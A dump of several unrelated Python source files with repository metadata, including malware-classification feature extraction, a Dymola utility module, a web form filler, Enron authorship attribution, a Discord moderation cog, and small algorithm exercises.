q3m=np.mean(sizes[-2*qlen:-qlen])
q4m=np.mean(sizes[-qlen:])
sizes=sorted(sizes)
maxidx=slen-1
fout.write('%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f\n'%(
sizes[0],
sizes[10*maxidx//100],
sizes[20*maxidx//100],
sizes[30*maxidx//100],
sizes[50*maxidx//100],
sizes[70*maxidx//100],
sizes[80*maxidx//100],
sizes[90*maxidx//100],
sizes[-1],
round(np.mean(sizes)),
q1m,q2m,q3m,q4m))
######################################################
# build combined train and test files
"""
function writecombifile
input: list of lists with 2 entries: file name and optional feature names (None for all), filename to write results to
output: writes file with combined feature sets
* combine features from different sets into a single file
* ids, labels and header are optional
"""
def writecombifile(sourcefilesandselections,filename,includeid=True,includelabel=True,header=True):
nsource=len(sourcefilesandselections)
for trainortest in ['train','test']:
alldata=[]
allnames=[]
for source,selection in sourcefilesandselections:
data,names=readdata('%s_%s'%(trainortest,source),selectedcols=selection)
alldata.append(data)
allnames.extend(names)
with open('%s_%s'%(trainortest,filename),'w') as f:
w=csv.writer(f)
if header:
w.writerow((['Id'] if includeid else [])+
allnames+
(['Class'] if includelabel else []))
ids = trainids if trainortest=='train' else testids
for inum,i in enumerate(ids):
datarow=[]
for src in xrange(nsource):
datarow.extend(alldata[src][inum])
w.writerow(
([i] if includeid else [])+
datarow+
([labels[inum] if trainortest=='train' else -1] if includelabel else []))
######################################################
# go
if __name__ == '__main__':
writefileprops(trainids,'train')
writefileprops(testids,'test')
writeasmcontents(trainids,'train')
writeasmcontents(testids,'test')
reduceasmcontents()
writeasmstats()
writeblocksizes(trainids,'train')
writeblocksizes(testids,'test')
writeblocksizedistributions('train')
writeblocksizedistributions('test')
writecombifile(
(
['fileprops.csv',None],
['asmcontents.csv',
['sp_%s'%key for key in selsections]
+['dl_%s'%key for key in seldlls]
+['op_%s'%key for key in selopcs]
+['qperc']
+[e for e in countbysection(None,selsections,namesonly=True) if e.endswith('_c?')]
],
),
'20.csv',
includeid=False,
includelabel=False,
header=False
)
writecombifile(
(
['fileprops.csv',None],
['asmcontents.csv',
['dl_%s'%key for key in seldlls]
+['op_%s'%key for key in selopcs]
+['qperc']
+countbysection(None,selsections,namesonly=True)
],
),
'28_std.csv',
includeid=False,
includelabel=False,
header=False
)
writecombifile(
(
['fileprops.csv',None],
['asmcontents_red.csv',
['dl_%s'%key for key in seldlls]
+['op_%s'%key for key in selopcs]
+['qperc']
+countbysection(None,selsections,namesonly=True)
],
['asmstats.csv',None],
['blocksizedistributions.csv',None],
),
'45c.csv',
includeid=False,
includelabel=False
)
| true |
986daa339aea83c63417e94b6d34ec9e2a961453 | Python | BrechtBa/dympy | /dympy/util.py | UTF-8 | 4,657 | 2.953125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env/ python
################################################################################
# Copyright (c) 2016 Brecht Baeten
# This file is part of dympy.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
######################################################################################
import numpy as np
import scipy.io
def get_value_array(res,key):
"""
Creates and array of result keys with the same name but differtent indices
Parameters
----------
res : dict
results dictionary
key : string
variable name
Returns
-------
val : numpy.ndarray
nd array with values
Examples
--------
>>> get_value_array({'time':[0,43200,86400],'u[1]':[1000,5000,2000],'u[2]':[2000,8000,3000]},'u')
"""
# find the dimensions of the result
for k in res:
if key + '[' == k[:len(key)+1]:
index_string = k[len(key):-1]
print(index_string)
temp_index_list = np.array([int(x) for x in index_string.split(',')])
try:
index_list = np.maximum(index_list,temp_index_list)
except:
index_list = temp_index_list
# create an empty value array
val = np.zeros(np.append(len(res['time']),index_list))
# fill the array by iterating over all dimensions
it = np.nditer(val[0,:],flags=['multi_index'])
while not it.finished:
index_string = '{}'.format(it.multi_index)[1:-1].replace(' ','')
val[(Ellipsis,)+it.multi_index] = res[ key + '[{}]'.format(index_string)]
it.iternext()
return val
def get_children(res,key):
"""
Returns a list with all keys in res starting with key
Parameters
----------
res : dict
results dictionary
key : string
a search key
Returns
-------
keys : list
list of keys that start with key
Examples
--------
>>> get_keys_with({'time':[0,43200,86400],'A.B':[1000,5000,2000],'A.C':[2000,8000,3000]},'A')
"""
if key == '':
return res.keys()
else:
keys = []
for k in res.keys():
if k.startswith(key):
keys.append(k)
return keys
def savemat(filename,data,order=None):
"""
Writes a binary file which can be loaded by dymola
Parameters
----------
data : dict
dictionary with name, value pairs
order : list
list of keys representing the order of the data in the saved file
Examples
--------
>>> savemat({'time':[0,43200,86400],'u':[1000,5000,2000]})
"""
Aclass = ['Atrajectory ',
'1.0 ',
'Generated from Matlab']
# make sure time is the first element
names,values = dict2list(data,order)
values = zip(*data)
scipy.io.savemat( filename, {'Aclass': Aclass}, appendmat=False, format='4')
with open(filename, 'ab') as f:
scipy.io.savemat(f, {'names': names}, format='4')
with open(filename, 'ab') as f:
scipy.io.savemat(f, {'data': values}, format='4')
def dict2list(data,order=None):
"""
Converts a dictionary to a list of keys and a list of values
Parameters
----------
data : dict
dictionary with name, value pairs
order : list
list of keys representing the order of the data in the saved file
Examples
--------
>>> dict2list({'time':[0,43200,86400],'u':[1000,5000,2000]})
"""
names = []
# first add the keys in order
if order!=None:
for key in order:
names.append(key)
# add the rest
for key in data:
if not key in names:
names.append(key)
# create the values list
values = []
for key in names:
values.append(data[key])
return names,values
| true |
67ef96c5e268334de836419bdde618840812f181 | Python | tanwaarpornthip/psuPortal | /scripts/TQF_filler/TQF_filler.py | UTF-8 | 1,829 | 2.546875 | 3 | [] | no_license | import sys
import time
import random
import pickle
import simplejson
import splinter
# Declare constants here
targetURL = 'https://tqf-phuket.psu.ac.th'
# Frequently used objects
Browser = splinter.Browser
def openNewSession():
#browser = Browser('chrome',incognito=True,headless=True)
browser = Browser('chrome')
return browser
def closeSession(browser):
browser.quit()
def mainSession(browser,inputFile):
browser.visit(targetURL)
# First, get credential
inputFile.readline()
credentialLocation = inputFile.readline()[:-1]
with open(credentialLocation) as credentialFile:
credentialFile.readline()
username = credentialFile.readline()[:-1]
credentialFile.readline()
password = credentialFile.readline()[:-1]
print(username, password)
browser.fill("ctl00$MainContent$Login1$UserName",username)
browser.fill("ctl00$MainContent$Login1$Password",password)
browser.find_by_id('MainContent_Login1_BtnSignin').first.click()
for line in inputFile:
if line[0] != '#':
print(line[:-1])
#
#
# if not(isinstance(name,list)):
# choice = interact(browser, index,name)
# else:
# lastChoice = int(selected[timeCounter][index][1:]) # Assume 0 offset here
# choiceName = idList[index][lastChoice] #Assume 0 offset here?
# choice = interact(browser, index,choiceName,lastChoice)
# selected[timeCounter].append(choice)
# print(index, name, choice)
if __name__ == "__main__":
# Taking number of times input from command line
# If not given, just one time.
with open('input.txt','r') as inputFile:
browser = openNewSession()
mainSession(browser,inputFile)
# Selected choices, first index of each element is the selection choice
| true |
9a360e172d6daa5cc509d926648ec98540b12770 | Python | tripp-maloney/enron_corpus_attribution | /punct_enron.py | UTF-8 | 7,614 | 3.046875 | 3 | [] | no_license | """
fwa_enron.py
- Tripp Maloney, 2019
This script takes a tsv extracted from the Enron email corpus and tests how effectively function word analysis can distinguish authorship.
"""
import numpy as np
import argparse
from sklearn.naive_bayes import MultinomialNB
from collections import Counter
def load_function_words(resource_path):
"""load a newline separated text file of function words.
Return a list"""
f_words = []
with open(resource_path, 'r') as f:
for line in f:
if line.strip():
f_words.append(line.lower().strip())
return f_words
def load_texts(path):
authors = []
texts = []
with open(path, 'r', encoding='utf-8') as f:
lines = f.readlines()
for line in lines:
fields = line.lower().strip().split("\t")
authors.append(fields[1])
texts.append(fields[-1])
return authors, texts, lines
def unison_shuffle(a, b, c):
rng_state = np.random.get_state()
np.random.shuffle(a)
np.random.set_state(rng_state)
np.random.shuffle(b)
np.random.shuffle(c)
def split_dataset(X, y, hold_out_percent):
"""shuffle and split the dataset. Returns two tuples:
(X_train, y_train, train_indices): train inputs
(X_val, y_val, val_indices): validation inputs"""
# index all data
index = np.arange(X.shape[0])
unison_shuffle(X, y, index)
split_point = int(np.ma.size(y) * hold_out_percent)
X_train, X_val = X[:split_point,:], X[split_point:,:]
y_train, y_val = y[:split_point], y[split_point:]
train_indices, val_indices = index[:split_point], index[split_point:]
#return ((X_train,y_train,np.arange(X.shape[0])), (X_val,y_val,np.arange(X.shape[0])))
return ((X_train,y_train,train_indices), (X_val,y_val,val_indices))
def zero_rule_algorithm(train, test):
"""Gives a most common class baseline for the dataset as split into training and testing sets"""
output_vals = [row for row in train]
prediction = max(set(output_vals), key=output_vals.count)
predicted = np.asarray([prediction for i in range(len(test))])
return predicted
def accuracy_scorer(array1, array2):
element_check = array1 == array2
score = np.sum(element_check)
return score
def narrow_scope(authors, lines):
c = Counter(authors)
top_2 = c.most_common(2)
t2 = [i[0] for i in top_2]
top_5 = c.most_common(5)
t5 = [i[0] for i in top_5]
top_10 = c.most_common(10)
t10 = [i[0] for i in top_10]
top_50 = c.most_common(50)
t50 = [i[0] for i in top_50]
narrow_2 = []
narrow_5 = []
narrow_10 = []
narrow_50 =[]
for line in lines:
fields = line.lower().strip().split("\t")
if fields[1] in t2:
narrow_2.append(line)
narrow_5.append(line)
narrow_10.append(line)
narrow_50.append(line)
elif fields[1] in t5:
narrow_5.append(line)
narrow_10.append(line)
narrow_50.append(line)
elif fields[1] in t10:
narrow_10.append(line)
narrow_50.append(line)
elif fields[1] in t50:
narrow_50.append(line)
return narrow_2, narrow_5, narrow_10, narrow_50
def fwa(lines, vocab_path):
"""Build an authorship attribution classifier using MultinomialNaiveBayes for two authors.
Returns a basic report of MultinomialNB predictions on the test data (10% of input),
compared to a zero method baseline. Evaluates and reports the most accurate method."""
function_words = load_function_words(vocab_path)
reviews = []
authors = []
for line in lines:
fields = line.strip().lower().split("\t")
reviews.append(fields[-1])
authors.append(fields[1])
labels = np.asarray(authors)
# Make review - f-word array
review_features = np.zeros((len(reviews), len(function_words)), dtype=np.int)
for i, review in enumerate(reviews):
review_toks = review.split(" ")
for j, function_word in enumerate(function_words):
review_features[i, j] = len([w for w in review_toks if w == function_word])
# split into training and testing arrays
train, test = split_dataset(review_features, labels, 0.9)
# create binary version of the same arrays
train_binary = np.copy(train[0])
test_binary = np.copy(test[0])
def f(x):
return 1 if x > 0 else 0
f = np.vectorize(f)
train_binary = f(train_binary)
test_binary = f(test_binary)
# implement and print score for zero rule classifier
zero_rule_predictions = zero_rule_algorithm(train[1], test[0])
print("Baseline Predictions:")
print(list(zero_rule_predictions))
print()
# check accuracy
zr_acc = accuracy_scorer(zero_rule_predictions, test[1])
zr_pct = "%.3f" % (zr_acc / len(test[1]) * 100)
print(f'{zr_acc} of {len(test[1])}, {zr_pct}% correct\n')
# use MultinomialNB to predict classes
nb_izer = MultinomialNB()
nb_izer.fit(train[0], train[1])
nb_predictions = nb_izer.predict(test[0])
print("Naive Bayes Predictions:")
print(list(nb_predictions))
print()
# check accuracy
nb_acc = accuracy_scorer(nb_predictions, test[1])
nb_pct = "%.3f" % (nb_acc / len(test[1]) * 100)
print(f'{nb_acc} of {len(test[1])}, {nb_pct}% correct\n')
# re-implement on binary array
nb_izer.fit(train_binary, train[1])
nb_binary = nb_izer.predict(test_binary)
print("Binary NB Predictions:")
print(list(nb_binary))
print()
# check accuracy
bin_acc = accuracy_scorer(nb_binary, test[1])
bin_pct = "%.3f" % (bin_acc / len(test[1]) * 100)
print(f'{bin_acc} of {len(test[1])}, {bin_pct}% correct\n')
# print the actual authors for comparison. This is probably superfluous.
print("Actual Authors:")
print(list(test[1]))
print()
# determine best test on this run
if max(zr_acc, nb_acc, bin_acc) == zr_acc:
print("Tests did not beat baseline.")
elif nb_acc == bin_acc > zr_acc:
print("Best test: Naive Bayes, integers OR boolean.")
elif max(zr_acc, nb_acc, bin_acc) == nb_acc:
print("Best method: Naive Bayes with integers.")
elif max(zr_acc, nb_acc, bin_acc) == bin_acc:
print("Best method: Naive Bayes with booleans.")
else:
print("Something strange has happened.")
return zr_pct, nb_pct, bin_pct
def main(path, fwlist, outfile='punct_results.txt'):
authors, emails, all_texts = load_texts(path)
top2, top5, top10, top50 = narrow_scope(authors, all_texts)
corpus_slices = [top2, top5, top10, top50, all_texts]
names = ["2", "5", "10", "50", "149"]
for i in range(len(corpus_slices)):
zr, nb, bin = fwa(corpus_slices[i], fwlist)
with open(outfile, 'a', encoding='utf-8') as out:
out.write(f"{names[i]}\t{zr}\t{nb}\t{bin}\n")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='feature vector homework')
parser.add_argument('--path', type=str, default="all_emails_dbl_clean.tsv",
help='path to author dataset')
parser.add_argument('--function_words_path', type=str, default="punct_list.txt",
help='path to the list of words to use as features')
args = parser.parse_args()
main(args.path, args.function_words_path)
| true |
78bdf4318d36c88193f5f831e4ba254301a5c184 | Python | JelNiSlaw/Menel | /Menel/cogs/moderation.py | UTF-8 | 5,373 | 2.53125 | 3 | [
"MIT"
] | permissive | import asyncio
from typing import Callable, Literal, Optional, Union
import discord
from discord.ext import commands
from ..bot import Menel
from ..utils.context import Context
from ..utils.converters import ClampedNumber
from ..utils.misc import chunk
from ..utils.text_tools import plural, plural_time
from ..utils.views import Confirm
class PurgeFilters(commands.FlagConverter, case_insensitive=True, prefix="--", delimiter=""):
before: Optional[discord.Object]
after: Optional[discord.Object]
contains: Optional[str]
users: Optional[tuple[discord.User]] = commands.flag(aliases=["user"])
mentions: Optional[tuple[discord.User]]
type: Optional[Literal["humans", "bots", "commands", "webhooks", "system"]]
def checks_from_filters(filters: PurgeFilters) -> list[Callable]:
checks = []
if filters.contains is not None:
contains = filters.contains.lower()
checks.append(lambda msg: contains in msg.content.lower())
if filters.users is not None:
users = set(filters.users)
checks.append(lambda msg: msg.author in users)
if filters.mentions is not None:
mentions = set(filters.mentions)
empty_set = set()
checks.append(lambda msg: set(msg.mentions) & mentions != empty_set)
if filters.type is not None:
msg_type = filters.type
if msg_type == "humans":
checks.append(lambda msg: not msg.author.bot)
elif msg_type == "bots":
checks.append(lambda msg: msg.author.bot)
elif msg_type == "commands":
command = discord.MessageType.application_command
checks.append(lambda msg: msg.type is command)
elif msg_type == "webhooks":
checks.append(lambda msg: msg.webhook_id is not None)
elif msg_type == "system":
types = {discord.MessageType.default, discord.MessageType.reply, discord.MessageType.application_command}
checks.append(lambda msg: msg.type not in types)
return checks
class Moderation(commands.Cog):
@commands.command(aliases=["clear", "clean"], ignore_extra=False)
@commands.has_permissions(read_message_history=True, manage_messages=True)
@commands.bot_has_permissions(read_message_history=True, manage_messages=True)
@commands.cooldown(2, 5, commands.BucketType.user)
@commands.max_concurrency(2, commands.BucketType.user)
@commands.max_concurrency(1, commands.BucketType.channel, wait=True)
async def purge(self, ctx: Context, limit: ClampedNumber(1, 1000), *, filters: PurgeFilters):
"""Usuwa określoną ilość wiadomośi spełniających wszystkie filtry"""
async with ctx.typing():
checks = checks_from_filters(filters)
to_delete = []
async for m in ctx.channel.history(
limit=limit * 5, before=filters.before, after=filters.after, oldest_first=False
):
if all(check(m) for check in checks):
to_delete.append(m)
if len(to_delete) > limit:
break
if not to_delete:
await ctx.error("Nie znaleziono żadnych wiadomości pasującej do filtrów")
return
if ctx.message not in to_delete:
to_delete.insert(0, ctx.message)
del to_delete[limit + 1 :]
count_str = plural(len(to_delete) - 1, "wiadomość", "wiadomości", "wiadomości")
view = Confirm(ctx.author)
m = await ctx.embed(f"Na pewno chcesz usunąć {count_str}?", view=view)
await view.wait()
await m.delete()
if view.result is not True:
await ctx.embed("Anulowano usuwanie wiadomości", no_reply=True)
return
for messages in chunk(to_delete, 100):
await ctx.channel.delete_messages(messages)
if len(messages) >= 100:
await asyncio.sleep(1)
await ctx.embed(f"Usunięto {count_str}", no_reply=True, delete_after=5)
@commands.command("toggle-nsfw", aliases=["mark_nsfw", "nsfw"])
@commands.has_permissions(manage_channels=True)
@commands.bot_has_permissions(manage_channels=True)
@commands.cooldown(1, 3, commands.BucketType.channel)
async def toggle_nsfw(self, ctx: Context, *, channel: discord.TextChannel = None):
"""Oznacza lub odznacza wybrany kanał jako NSFW"""
channel = channel or ctx.channel
before = channel.nsfw
await channel.edit(nsfw=not before)
await ctx.embed(f"Oznaczono {channel.mention} jako {'SFW' if before else 'NSFW'}")
@commands.command()
@commands.has_permissions(manage_channels=True)
@commands.bot_has_permissions(manage_channels=True)
@commands.cooldown(2, 5, commands.BucketType.channel)
async def slowmode(
self,
ctx: Context,
channel: Optional[discord.TextChannel],
*,
time: Union[Literal[False], ClampedNumber(1, 21600)],
):
"""Ustawia czas slowmode kanału"""
channel = channel or ctx.channel
await channel.edit(slowmode_delay=time)
if time is not False:
await ctx.embed(f"Ustawiono czas slowmode na {channel.mention} na {plural_time(time)}")
else:
await ctx.embed(f"Wyłączono slowmode na {channel.mention}")
def setup(bot: Menel):
bot.add_cog(Moderation())
| true |
39d36d41fbb2ae1e11c54582278855c2cb1f6cb3 | Python | PikaKight/ICS4U-Classwork | /Coding_Practice/Algorithms/linear_searching.py | UTF-8 | 1,141 | 4.1875 | 4 | [] | no_license | """
Search a list of ints for a particular integer. Return the index location, -1 if not found.
Search a list of ints for the last occurrence of a particular integer. -1 if not found.
Search a list of ints for every occurrence of a particular integer. Return a list of every index number. Empty list of not found.
Search a list of strings for words that start with a substring. Return the first occurrence index.
Search a list of strings for words that start with a substring. Return list of all the strings (not the index positions).
"""
from typing import List
def int_search(target: int, numbers: List[int]) -> int:
for i, num in enumerate(numbers):
if num is target:
return i
return -1
def int_occurrance_search(target:int, numbers: List[int]) -> int:
numbers = numbers[::-1]
for i, num in enumerate(numbers):
if num is target:
return (len(numbers) - (i + 1))
return -1
def list_occurrance(target:int, numbers: List[int]) -> List:
occurrance = []
for i, num in enumerate(numbers):
if num is target:
occurrance.append(i)
return occurrance
| true |
0003ac8a67d6893b9e1ae1fd388e8075c61e4806 | Python | eternaltc/test | /Test/Exception/except11.py | UTF-8 | 86 | 3.328125 | 3 | [] | no_license |
a = 10
while True:
b = 3
a = a + b
print("1")
print(a)
print("2") | true |
1f4edf1dd7ef356b8b79655dd89e81b1df5bf12a | Python | DequanZhu/FaceNet-and-FaceLoss-collections-tensorflow2.0 | /options/train_options.py | UTF-8 | 5,609 | 2.5625 | 3 | [] | no_license | import argparse
import os
import sys
import pandas as pd
class TrainOptions():
def __init__(self,argv):
self.argv=argv
self.parser = argparse.ArgumentParser()
self.initialized = False
def initialize(self):
# Common parameters for training the model
self.parser.add_argument('--loss_type', type=str,
choices=['OrignalSoftmax', 'L2Softmax','LSoftmax', 'AMSoftmax','ArcFaceSoftmax','CenterLoss','ASoftmax',],
default='OrignalSoftmax',
help='the margin is m in formula cos(theta-m) ')
self.parser.add_argument('--backbone', type=str, default='Resnet50',
help='The base network for extracting face features ')
self.parser.add_argument('--restore', action='store_true',
help='Whether to restart training from checkpoint ')
self.parser.add_argument('--max_epoch', type=int, default=1,
help='The max number of epochs to run')
self.parser.add_argument('--nrof_classes', type=int, default=10000,
help='The number of identities')
self.parser.add_argument('--batch_size', type=int,
default=32, help='The num of one batch samples')
self.parser.add_argument('--image_size', type=int,
default=160, help='The size of input face image')
self.parser.add_argument('--embedding_size', type=int,
default=128, help='The size of the extracted feature ')
self.parser.add_argument('--checkpoint_dir', type=str, default='../checkpoint/',
help='Directory where to save the checkpoints')
self.parser.add_argument('--log_dir', type=str, default='../logs/',
help='Directory where to save training log information ')
self.parser.add_argument('--datasets', type=str, default='/home/zdq/vgg_tfrcd/',
help='Directory where to load train and validate tfrecord format data')
self.parser.add_argument('--learning_rate', type=float, default=2e-3,
help='Initial learning rate. If set to a negative value a learning rate ')
self.parser.add_argument('--eval-interval', type=int, default=1,
help='evaluuation interval (default: 1)')
self.parser.add_argument('--no-val', action='store_true', default=False,
help='skip validation during training')
# Parameters for LSoftmax, ArcFaceSoftmax, AMSoftmax
self.parser.add_argument('--margin', type=float, default=0.3,
help='The margin is m in ArcFaceSoftmax formula s*cos(theta-m) or in AMSoftmax formula s*(cos(theta)-m).')
self.parser.add_argument('--feature_scale', type=float, default=1,
help='The feature scales s in ArcFaceSoftmax formula s*cos(theta-m) or in AMSoftmax formula s*(cos(theta)-m) ')
# Parameters for L2Softmax
self.parser.add_argument('--l2_feature_scale', type=float, default=16.0,
help='The feature length ')
# Parameters for CenterLoss
self.parser.add_argument('--alpha', type=float, default=0.95,
help='Center update rate for center loss.')
self.parser.add_argument('--loss_weight', type=float, default=0.5,
help='Center loss factor.')
# Parameters for ASoftmax
self.parser.add_argument('--beta', type=int, default=1000,
help='the beta in formula fyi=(beta*ori_softmax_loss+A_softmax)/(1+beta)')
self.parser.add_argument('--decay', type=float, default=0.99,
help='the decay ratio of beta')
self.parser.add_argument('--beta_min', type=int, default=0,
help='the min value of beta and after that is no longer to reduce')
self.initialized = True
def parse(self, save=True):
if not self.initialized:
self.initialize()
opt=self.parser.parse_args(self.argv)
opt.checkpoint_dir=os.path.join(opt.checkpoint_dir, opt.loss_type, opt.backbone)
if not os.path.exists(opt.checkpoint_dir):
os.makedirs(opt.checkpoint_dir)
opt.log_dir=os.path.join(opt.log_dir, opt.loss_type, opt.backbone)
if not os.path.exists(opt.log_dir):
os.makedirs(opt.log_dir)
df=pd.read_csv(os.path.join(opt.datasets,'info.csv'))
# opt.nrof_classes = df['class_num'][0]
args = vars(opt)
print('------------ Options -------------')
for k, v in sorted(args.items()):
print('%s: %s' % (str(k), str(v)))
print('-------------- End ----------------')
# save to the disk
if save and not opt.restore:
file_name = os.path.join(opt.checkpoint_dir, 'opt.txt')
with open(file_name, 'wt') as opt_file:
opt_file.write('------------ Options -------------\n')
for k, v in sorted(args.items()):
opt_file.write('%s: %s\n' % (str(k), str(v)))
opt_file.write('-------------- End ----------------\n')
return opt
if __name__=='__main__':
opt=TrainOptions(sys.argv[1:]).parse()
# print(opt) | true |
223a0e5068ab237eacb7a6d5e9c82be25a87b31b | Python | EriKKo/adventofcode-2018 | /5/a.py | UTF-8 | 445 | 2.875 | 3 | [] | no_license | unit = map(ord, raw_input())
next = [i + 1 for i in range(len(unit))]
next[-1] = -1
prev = [i - 1 for i in range(len(unit))]
alive = [True for c in unit]
p = 0
while next[p] >= 0:
b = next[p]
if abs(unit[p] - unit[b]) == 32:
alive[p] = alive[b] = False
if prev[p] >= 0:
next[prev[p]] = next[b]
if next[b] >= 0:
prev[next[b]] = prev[p]
p = prev[p] if prev[p] >= 0 else next[b]
else:
p = b
print sum(alive)
| true |
47abbda8483957cb999d992a9403bbcc4ce56c7c | Python | gamesguru/hackerrank-interview-prep | /00_arrays/array-ds.py | UTF-8 | 295 | 3.328125 | 3 | [] | no_license | #!/bin/python3
# Complete the reverseArray function below.
def reverseArray(a):
n = len(a) - 1
for i in range(len(a) // 2):
j = n - i
a[i], a[j] = a[j], a[i]
return a
if __name__ == "__main__":
arr = [1, 3, 4, 2]
res = reverseArray(arr)
print(res)
| true |
df508c1b4ee5b4ae98c1f9a0f00df5e9136469dd | Python | ranchunju147/jiaocai | /day2/tuple_type.py | UTF-8 | 127 | 3.25 | 3 | [] | no_license | #元组,只能被读取
atuple = (1,2,3,4,5,6,7)
if __name__ == '__main__':
print(atuple[1])
print(atuple[2:5])
| true |
96d8cd904ba3302280684487ad9f7d5e3f965611 | Python | moheed/algo | /lc953_verifyAlienDictSorted.py | UTF-8 | 1,272 | 3.25 | 3 | [
"MIT"
] | permissive | class Solution:
def lexo(self, word1, word2, populate_order):
count=0;
lw1=len(word1)
lw2=len(word2)
i=0
while count<lw1:
if count==lw2:#word2 finished
return False
x=word1[count]
y=word2[count]
if populate_order[ord(x)-ord('a')] < populate_order[ord(y)-ord('a')]:#return true
print(x,populate_order[ord(x)-ord('a')], y, populate_order[ord(y)-ord('a')])
return True
elif populate_order[ord(x)-ord('a')] == populate_order[ord(y)-ord('a')]:
count+=1
else:
return False
if count == lw1:
return True
return False
def isAlienSorted(self, words: List[str], order: str) -> bool:
populate_order=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]#26 alphabets
count=0
index=0
for x in order:
index=ord(x)-ord('a')
populate_order[index]=count;
count+=1
print(populate_order)
i=0;
while i< len(words)-1:
if not self.lexo(words[i], words[i+1], populate_order):
return False
i+=1
return True
| true |
e33be7c51e1a666e84c51c3597b001e351246d53 | Python | dfmartinez11/diego | /graficar.py | UTF-8 | 1,337 | 2.875 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
from numpy import fft as f
datos = np.loadtxt("datos.dat")
dato = np.loadtxt("difSencilla.dat")
datoss = np.loadtxt("difSencillaLeapF.dat")
x = datos.transpose()[0]
y = datos.transpose()[1]
a=plt.figure()
v1 = plt.subplot(3,2,1)
#plt.xlim(0,10)
v1.plot(x,y, color="r")
v1.plot(x,2*y +1, color ="g")
plt.legend(["original" , "aumentada"])
v2=plt.subplot(3,2,2)
#plt.xlim(0,15)
v2.plot(x,y+np.random.rand(len(y)), color ="b")
y = y + np.random.rand( len(y) )
fo = f.fftshift(f.fft(y))
x = f.fftshift(f.fftfreq( len(y) ))
#y[abs(x) > 0.1] = 0
fo[abs(x) > 0.0085] = 0
a1=plt.subplot(3,2,3)
a1.plot(x,abs(fo))
plt.legend(["fourier ODE"])
iy = f.ifft(fo)
a2 = plt.subplot(3,2,4)
a2.plot(x,iy, color="r")
#plt.xlim(0,0.1)
plt.legend(["inversa"])
dato = np.loadtxt("difSencillaRunge.dat")
v3 = plt.subplot(3,2,5)
v3.plot(dato.transpose()[0],dato.transpose()[1], color="b")
v3.plot(datos.transpose()[0],datos.transpose()[1], color="r")
#plt.xlim(0,0.1)
plt.legend(["Runge","Euler"])
v4 = plt.subplot(3,2,6)
v4.plot(dato.transpose()[0],dato.transpose()[1], color="b")
v4.plot(datoss.transpose()[0],datoss.transpose()[1], color="g")
#plt.xlim(0,0.1)
plt.legend(["Runge","LeapF"])
a.savefig("graficaCPP.png")
| true |
2bf792e2b68953a11d60a740e519047d5e1ba986 | Python | warlockee/leetpy | /algos/merge-sorted-array.py | UTF-8 | 829 | 3.59375 | 4 | [] | no_license | # https://leetcode.com/problems/merge-sorted-array/
class Solution(object):
def merge(self, nums1, m, nums2, n):
# Compare nums1 and nums2 from backward
# Put the larger one to nums1's end
# If one of the array is done
# The rest is already sorted
# Just put them in place
i = m + n - 1 # cursor on nums1 that we are editting
i1 = m - 1 # cursor on nums1
i2 = n - 1 # cursor on nums2
while i1 >= 0 and i2 >= 0:
if nums1[i1] > nums2[i2]:
nums1[i] = nums1[i1]
i1 = i1 - 1
i = i - 1
else:
nums1[i] = nums2[i2]
i2 = i2 - 1
i = i - 1
# One of the array is done, put the rest in place
nums1[:i2 + 1] = nums2[:i2 + 1]
| true |
97fae16d0869e669d4bac411b383cbabcd7d0736 | Python | surajduncan/ml_programs | /naive_bayesian_bulitin.py | UTF-8 | 1,684 | 3.53125 | 4 | [] | no_license | # Assuming a set of documents that need to be classified, use the naïve Bayesian Classifier model to perform this task.
# Built-in Java classes/API can be used to write the program.
# Calculate the accuracy, precision, and recall for your data set.
# naive bayesian classifier
import pandas as pd
msg=pd.read_csv('naivebuiltin.csv',header=None,names=['message','label'],)
print('The dimensions of the dataset',msg.shape)
msg['labelnum']=msg.label.map({'pos':1,'neg':0})
X=msg.message
y=msg.labelnum
from sklearn.model_selection import train_test_split
xtrain,xtest,ytrain,ytest=train_test_split(X,y,random_state=1)
print('dimensions of train and test sets')
print(xtrain.shape)
print(xtest.shape)
print(ytrain.shape)
print(ytest.shape)
#output of count vectoriser is a sparse matrix
from sklearn.feature_extraction.text import CountVectorizer
count_vect = CountVectorizer()
xtrain_dtm = count_vect.fit_transform(xtrain)
xtest_dtm=count_vect.transform(xtest)
# Training Naive Bayes (NB) classifier on training data.
from sklearn.naive_bayes import MultinomialNB
clf = MultinomialNB().fit(xtrain_dtm,ytrain)
predicted = clf.predict(xtest_dtm)
print('\nclassification results of testing samples are given below')
for doc,p in zip(xtest,predicted):
pred='pos' if p==1 else 'neg'
print('%s->%s' %(doc,pred))
#printing accuracy metrics
from sklearn import metrics
print('Accuracy metrics')
print('Accuracy of the classifer is',metrics.accuracy_score(ytest,predicted))
print('Confusion matrix')
print(metrics.confusion_matrix(ytest,predicted))
print('Recall and Precison ')
print(metrics.recall_score(ytest,predicted))
print(metrics.precision_score(ytest,predicted))
| true |
843501fcf83e3fd56343afe1740c9e035e733ff8 | Python | AleTavares/colheitaSoja | /processaPDFHistorico.py | UTF-8 | 3,326 | 2.75 | 3 | [] | no_license | from PyPDF2 import PdfFileReader
import pandas as pd
from tabula import read_pdf
import re
import os
import bancoDados as bd
# Função para limpar sujeira coluna Nordeste
def limpaValores(strLimpar):
if "/" in strLimpar:
arrTemp = strLimpar.split('/')
formulaRegex = r"\D"
valorPosVirgula = re.sub(formulaRegex, "", arrTemp[1])
ValorAntesVirgula = str(arrTemp[0][len(arrTemp[0])-3])+str(arrTemp[0][-1])
retorno = str(ValorAntesVirgula) + '.' + str(valorPosVirgula)
else:
retorno = strLimpar
return retorno
# Função para ajustar as datas
def ajustaData(strData):
mes = {
'jan': '1',
'fev': '2',
'mar': '3',
'abr': '4',
'jun': '6',
'jul': '7',
'ago': '8',
'set': '9',
'out': '10',
'nov': '11',
'dez': '12'
}
arrData = strData.split('-')
dataAjustada = '20'+arrData[2] + '-' + mes[arrData[1]] + '-' + arrData[0]
return dataAjustada
# Função para processar arquivos PDF
